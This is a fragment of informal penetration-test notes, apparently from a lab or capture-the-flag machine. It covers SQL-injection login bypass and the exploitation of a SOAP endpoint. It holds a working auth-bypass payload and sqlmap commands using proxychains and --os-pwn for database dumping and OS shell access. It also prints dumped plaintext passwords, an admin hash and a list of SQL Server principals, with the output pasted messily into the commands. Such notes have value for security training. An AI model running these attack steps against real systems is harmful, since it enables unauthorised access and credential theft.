which then leads to the login page.
admin' OR '1'='1--
used the above command to bypass the authentication
Soap enevelop
- Downloaded the wsdler extension in burpusite
- change the post request to have wsdl at the end
- send it to wsdler
- saved the file in req.txt (The one with Dev)
- used sqlmap to dump all
proxychains sqlmap -r req.txt --dbs --level 5 --risk 3 -v 3 --current-user
sqlmap -r req.txt --dbs --level 5 --risk 3 -v 3 --os-pwn+--------+-------------+----------+
| UserID | Password | Username |
+--------+-------------+----------+
| 1 | Str0ngP@ss! | Bob |
| 2 | S3cretP@ss! | Rob |
| 3 | Harder! | Try |
+--------+-------------+----------+
[*] BUILTIN\\Users
[*] NT AUTHORITY\\SYSTEM
[*] NT Service\\MSSQL$SQLEXPRESS
[*] NT SERVICE\\SQLWriter
[*] NT SERVICE\\Winmgmt
[*] sa (administrator)
[*] SQL01\\Administrator
[*] sql_read
| eb900f7d1ed53c96cd85dddb49c8ed4a | admin
Getting a Shell on SQL01
- Parameter 2 worked no the parameter 1.
- The last parameter is always better.